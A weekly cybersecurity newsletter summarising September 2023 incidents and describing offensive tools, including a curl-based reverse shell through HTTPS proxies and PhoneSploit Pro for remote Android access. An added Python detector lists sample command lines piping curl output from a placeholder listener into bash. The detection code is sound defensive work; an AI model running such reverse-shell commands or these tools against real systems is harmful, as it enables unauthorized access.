Week 38, September 18-24, 2023

Cybersecurity Weekly Updates.

This week in the world of cybersecurity:

New AMBERSQUID Attacks on AWS Services
This week, a new cryptojacking operation called AMBERSQUID started going after uncommon AWS services. The main point is that even less-known services on AWS can be targets, so you need to keep all parts of your cloud secure.

MFA and PAM Solutions Might Not Be Enough
If you think MFA (Multi-Factor Authentication) and PAM (Privileged Access Management) solutions keep you completely safe, it’s time to think again. Some people found ways to get around these security steps, so always keep an eye out for updates and new ways to protect yourself.

Financial Focus in Ransomware Attacks by UNC3944
A group known as UNC3944 has switched its focus to ransomware attacks with a financial motive. This suggests that ransomware continues to be a profitable route for cybercriminals and companies should stay alert.

Microsoft’s Big Data Leak
A big mistake happened at Microsoft, where 38 terabytes of confidential data got exposed by their own AI researchers. It’s a good reminder that even big companies can mess up and leak data, so being careful is key.

Apple’s Urgent Security Patch for Zero-Day Flaws
Apple had to quickly fix three new zero-day flaws this week, affecting iOS, macOS, and Safari. This means that even well-known and trusted brands like Apple can have serious issues that need fast action.

 


Recent Tools and Techniques

These are some of the recent tools and techniques in the cyber-security sphere that have captured my attention.

The CURL shell tool is designed to help security researchers establish a reverse shell in environments where only HTTPS proxy connections are allowed. It runs an HTTP server that multiplexes the standard input, output, and error channels of a remote reverse shell through an HTTPS proxy. To use it, start the listener with a specified certificate, private key, and listening port. On the remote machine, the reverse shell is initiated with a curl command that communicates with the listener and pipes the output to bash for execution.
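For defenders, the step where curl output is piped into bash shows up in command-line telemetry. The following is an added example, not code from the tool or from this newsletter: a small detector that parses a logged shell command line and flags a curl stage feeding a shell, including through a proxy. The function names, host names and sample lines are constructed for illustration.

```python
import os
import shlex

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
PROXY_FLAGS = ("-x", "--proxy")  # curl's proxy options
PROXY_ENV = ("https_proxy=", "http_proxy=", "all_proxy=")

def split_pipeline(cmdline):
    """Tokenise like a POSIX shell (Python 3.8+); None marks ';', '&&', '||', '&'."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""
    stages = [[]]
    for tok in lex:  # raises ValueError on unbalanced quotes
        if tok in ("|", "|&"):
            stages.append([])
        elif tok in (";", "&&", "||", "&"):
            stages += [None, []]
        else:
            stages[-1].append(tok)
    return stages

def program(stage):
    """Executable basename, skipping VAR=value prefixes and wrappers such as sudo."""
    for tok in stage or []:
        if "=" not in tok and os.path.basename(tok) not in ("sudo", "nohup", "env"):
            return os.path.basename(tok)
    return None

def detect(cmdline):
    """Return a finding if curl output is piped into a shell, else None."""
    try:
        stages = split_pipeline(cmdline)
    except ValueError:  # unbalanced quotes: not a parseable shell line
        return None
    for prev, stage in zip([None] + stages, stages):
        name = program(stage)
        if name in SHELLS and "-c" in stage[:-1] and (
                hit := detect(stage[stage.index("-c") + 1])):  # sh -c '<script>'
            return hit
        if name in SHELLS and program(prev) == "curl":
            proxy = any(t.startswith(PROXY_FLAGS) or t.lower().startswith(PROXY_ENV) for t in prev)
            return {"shell": name, "via_proxy": proxy, "fetch": prev}
    return None

# Constructed command lines, as process-creation telemetry might record them.
SAMPLES = [
    "curl -x http://proxy.example:3128 https://listener.example:443 | bash",
    "sh -c 'https_proxy=http://proxy.example:3128 curl -s https://listener.example/|sudo bash'",
    "echo 'curl https://listener.example | bash'",
]
```

Calling `detect()` on each entry of `SAMPLES` flags the first two lines and ignores the third, where the pipe is only quoted text.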

InfoHound is an OSINT tool focused on domain profiling, particularly useful during the reconnaissance phase of a security assessment. The tool employs passive analysis techniques to gather a wide range of data given a web domain name. It can collect emails, names, files, subdomains, usernames, and URLs, which are then further analyzed to extract more detailed information. The tool is modular, offering various retrieval and analysis options ranging from Whois lookups and DNS record queries to subdomain take-over checks and email breach assessments. InfoHound can be easily installed using Docker and allows for the addition of custom modules for extended functionality.

NucleiFuzzer is an automation tool designed for web application security testing. It combines the features of ParamSpider and Nuclei to detect a range of vulnerabilities such as XSS, SQLi, SSRF, and Open-Redirect. By using ParamSpider to find possible entry points and Nuclei to carry out vulnerability scanning, the tool streamlines the detection process. This makes it easier for both security professionals and web developers to identify and fix security risks in a more efficient manner.

PhoneSploit Pro is a hacking tool written in Python aimed at remotely exploiting Android devices. It automates the use of ADB (Android Debug Bridge) and Metasploit-Framework to gain unauthorized access to Android devices, provided they expose ADB on TCP port 5555. The tool offers a range of features for both Wi-Fi and USB connections, including remote shell access, screenshot capture, and file transfers between the target device and the computer. It also provides automated payload creation and deployment to obtain a Meterpreter session, which essentially gives full control over the targeted Android device. The tool comes with added functionalities like SMS sending, device unlocking, and local network scanning, among others. It aims to simplify penetration testing on Android devices by automating various tasks.


That’s a wrap on this week’s edition of the Cyber-Security Update. Remember, the cyber-security landscape is ever-changing, and staying informed is your primary defense. Hopefully, the insights and information shared today will assist in navigating this complex domain and in strengthening defenses against potential threats. Stay vigilant, stay informed, and look forward to more insights into the world of cyber-security in next week’s edition.

To stay in sync with the weekly cyber-security roundups, remember to subscribe to the newsletter and follow on social media platforms. If there are any questions or specific topics you’d like to see covered, don’t hesitate to get in touch.

 
